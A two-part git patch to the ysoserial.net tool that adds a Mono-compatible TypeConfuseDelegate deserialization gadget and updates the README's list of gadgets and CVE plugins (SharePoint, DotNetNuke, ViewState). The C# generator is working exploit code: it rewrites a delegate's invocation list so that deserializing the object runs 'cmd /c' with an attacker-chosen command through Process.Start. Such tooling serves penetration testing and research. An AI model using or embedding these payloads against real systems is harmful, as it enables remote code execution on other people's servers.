From 16d07ba146314d1e8f7ef761e6193baf4cb8e216 Mon Sep 17 00:00:00 2001 From: DoI <5291556+denandz@users.noreply.github.com> Date: Mon, 21 Oct 2019 21:34:44 +1300 Subject: [PATCH 1/2] Added Mono compatible TypeConfuseDelegate generator --- .../TypeConfuseDelegateMonoGenerator.cs | 57 +++++++++++++++++++ ysoserial/ysoserial.csproj | 3 +- 2 files changed, 59 insertions(+), 1 deletion(-) create mode 100755 ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs diff --git a/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs new file mode 100755 index 0000000..c595f26 --- /dev/null +++ b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs @@ -0,0 +1,57 @@ +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Reflection; + +namespace ysoserial.Generators +{ + class TypeConfuseDelegateMonoGenerator : GenericGenerator + { + public override string Name() + { + return "TypeConfuseDelegateMono"; + } + + public override string Description() + { + return "TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono"; + } + + public override List SupportedFormatters() + { + return new List { "BinaryFormatter", "ObjectStateFormatter", "NetDataContractSerializer", "LosFormatter" }; + } + + public override object Generate(string cmd, string formatter, Boolean test) + { + return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test); + } + + /* this can be used easily by the plugins as well */ + public object TypeConfuseDelegateGadget(string cmd) + { + if (File.Exists(cmd)) + { + Console.Error.WriteLine("Reading command from file " + cmd + " ..."); + cmd = File.ReadAllText(cmd); + } + Delegate da = new Comparison(String.Compare); + Comparison d = (Comparison)MulticastDelegate.Combine(da, da); + IComparer comp = Comparer.Create(d); + SortedSet set = new SortedSet(comp); + set.Add("cmd"); + set.Add("/c " + cmd); + + FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance); + object[] invoke_list = d.GetInvocationList(); + // Modify the invocation list to add Process::Start(string, string) + invoke_list[0] = new Func(Process.Start); + invoke_list[1] = new Func(Process.Start); + fi.SetValue(d, invoke_list); + + return set; + } + + } +} diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj index 147631f..a3391f7 100755 --- a/ysoserial/ysoserial.csproj +++ b/ysoserial/ysoserial.csproj @@ -88,6 +88,7 @@ + @@ -118,4 +119,4 @@ --> - \ No newline at end of file + From fb52cf82dbcee54e9a6a1ce36b109ece52b86bfb Mon Sep 17 00:00:00 2001 From: DoI <5291556+denandz@users.noreply.github.com> Date: Mon, 21 Oct 2019 21:47:48 +1300 Subject: [PATCH 2/2] Updated README.md --- README.md | 23 +++++++++++++++++++---- 1 file changed, 19 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 24fbbd0..ec89418 100644 --- a/README.md +++ b/README.md @@ -27,6 +27,13 @@ $ ./ysoserial -h ysoserial.net generates deserialization payloads for a variety of .NET formatters. Available formatters: + ActivitySurrogateDisableTypeCheck (ActivitySurrogateDisableTypeCheck Gadget by Nick Landers. Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.) + Formatters: + BinaryFormatter + ObjectStateFormatter + SoapFormatter + NetDataContractSerializer + LosFormatter ActivitySurrogateSelectorFromFile (ActivitySurrogateSelector gadget by James Forshaw. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.) Formatters: BinaryFormatter @@ -48,7 +55,7 @@ Available formatters: XmlSerializer DataContractSerializer YamlDotNet < 5.0.0 - TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz.) + TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz) Formatters: BinaryFormatter ObjectStateFormatter @@ -68,23 +75,31 @@ Available formatters: ObjectStateFormatter NetDataContractSerializer LosFormatter + TypeConfuseDelegateMono (TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono) + Formatters: + BinaryFormatter + ObjectStateFormatter + NetDataContractSerializer + LosFormatter WindowsIdentity (WindowsIdentity Gadget by Levi Broderick) Formatters: BinaryFormatter Json.Net DataContractSerializer + SoapFormatter Available plugins: - altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection) + ActivatorUrl (Sends a generated payload to an activated, presumably remote, object) + Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection) ApplicationTrust (Generates XML payload for the ApplicationTrust class) Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps) DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822) Resx (Generates RESX files) SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class) - SharePoint (Generates poayloads for SharePoint CVEs: CVE-2019-0604, CVE-2018-8421) + SharePoint (Generates poayloads for the following SharePoint CVEs: CVE-2019-0604, CVE-2018-8421) TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method) ViewState (Generates a ViewState using known MachineKey parameters) - + Usage: ysoserial.exe [options] Options: -p, --plugin=VALUE the plugin to be used